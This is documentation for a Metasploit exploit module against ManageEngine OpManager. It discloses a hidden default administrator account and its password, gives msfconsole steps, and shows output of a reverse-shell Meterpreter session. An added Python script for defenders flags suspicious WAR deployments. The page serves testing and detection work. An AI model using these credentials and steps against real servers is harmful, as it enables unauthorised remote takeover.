metasploit-gs/documentation/modules/exploit/windows/http/manage_engine_opmanager_rce.md

2017-06-20 17:45:44 -05:00

## Description
This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which cannot be reset through the user interface. By
logging in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload.
## Vulnerable Application
[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed
around "integrated network management".
This module has been verified against the following OpManager versions:
* v11.0
* v11.4
* v11.5
* v11.6
Installers:
* [OpManager Installers](http://archives.manageengine.com/opmanager/)
## Verification Steps
1. Start msfconsole
1. `use exploit/windows/http/manage_engine_opmanager_rce`
1. `set RHOST <IP addr of target system running OpManager>`
1. `exploit`
1. You should get a working Meterpreter session
## Scenarios
### Targeting Windows Server 2012 running OpManager v11.5
```
msf > use exploit/windows/http/manage_engine_opmanager_rce
msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
RHOST => 10.0.2.12
msf exploit(manage_engine_opmanager_rce) > exploit
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Access login page
[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
[*] Following redirection
[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
[*] Executing SQL queries
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Sending stage (49667 bytes) to 10.0.2.12
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : WIN-SI597APFOFH
OS : Windows Server 2008 6.2 (amd64)
Meterpreter : java/windows
```
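The description explains that the module writes a randomly named WAR into OpManager's bundled Tomcat and relies on auto-deployment, and the scenario output shows the artefacts that leaves behind (`tomcat//webapps//r63xuE3q1gOAZsCQuJ.war` is deleted by the module, but the exploded directory may need manual cleanup). The following script is an added example for defenders, not part of the Metasploit module or its documentation: it audits a Tomcat `webapps` listing against a baseline of expected context names and flags entries that look machine-generated, calling out the case where both a WAR and its exploded directory are present. The `EXPECTED_WEBAPPS` baseline and the `SAMPLE_LISTING` are constructed assumptions for the example, not OpManager's real set of web applications.

```python
"""Flag unexpected WAR deployments in a Tomcat webapps directory.

Added example, not code from the Metasploit module or from ManageEngine.
The EXPECTED_WEBAPPS baseline is an assumption for this example; populate it
from a known-good OpManager install before relying on it.
"""
import os
import re
from dataclasses import dataclass

# Assumed baseline of expected Tomcat contexts (assumption, not OpManager's real list).
EXPECTED_WEBAPPS = frozenset({"ROOT", "apiclient"})

# Heuristic for a machine-generated name: alphanumeric only, at least 12
# characters, mixing lower case, upper case and digits (the shape of the
# 'r63xuE3q1gOAZsCQuJ' name in the module output above).
_GENERATED = re.compile(r"(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9]{12,}$")


@dataclass(frozen=True)
class Finding:
    name: str
    kind: str      # "war" (archive), "dir" (exploded application) or "file"
    reason: str


def context_name(entry_name, is_dir):
    """Map a webapps entry to the Tomcat context it deploys as ('x.war' -> 'x')."""
    if not is_dir and entry_name.lower().endswith(".war"):
        return entry_name[:-4]
    return entry_name


def looks_generated(name):
    """True when the context name matches the random-name heuristic."""
    return _GENERATED.match(name) is not None


def audit_webapps(entries, expected=EXPECTED_WEBAPPS):
    """Return Findings for a sequence of (name, is_dir) webapps entries.

    Everything outside the baseline is reported. Random-looking names get a
    stronger reason, and a WAR whose exploded directory is also present is
    called out so both get removed together.
    """
    entries = list(entries)
    war_ctx = {context_name(n, d) for n, d in entries
               if not d and n.lower().endswith(".war")}
    dir_ctx = {n for n, d in entries if d}
    findings = []
    for name, is_dir in entries:
        ctx = context_name(name, is_dir)
        if ctx in expected:
            continue
        if is_dir:
            kind = "dir"
        elif name.lower().endswith(".war"):
            kind = "war"
        else:
            kind = "file"
        if looks_generated(ctx):
            reason = "random-looking name outside baseline"
            if ctx in war_ctx and ctx in dir_ctx:
                reason += "; WAR and exploded directory both present"
        else:
            reason = "not in baseline"
        findings.append(Finding(name, kind, reason))
    return findings


def scan_directory(path):
    """Audit a real webapps directory, e.g. <OpManager install>/tomcat/webapps."""
    with os.scandir(path) as it:
        return audit_webapps((e.name, e.is_dir()) for e in it)


# Constructed sample listing modelled on the artefacts in the module output above.
SAMPLE_LISTING = [
    ("ROOT", True),
    ("apiclient", True),
    ("r63xuE3q1gOAZsCQuJ", True),
    ("r63xuE3q1gOAZsCQuJ.war", False),
    ("reports", True),
]

if __name__ == "__main__":
    for f in audit_webapps(SAMPLE_LISTING):
        print(f"{f.kind:4} {f.name:26} {f.reason}")
```

Run it against a real install with `scan_directory(r"C:\...\OpManager\tomcat\webapps")` (path is an assumption; use the install's actual Tomcat directory). Entries that are merely "not in baseline" are candidates for adding to the baseline; a random-looking context, especially one with both the WAR and the exploded directory present, matches the pattern this module leaves behind and warrants investigation of the OpManager and Tomcat logs around the deployment time.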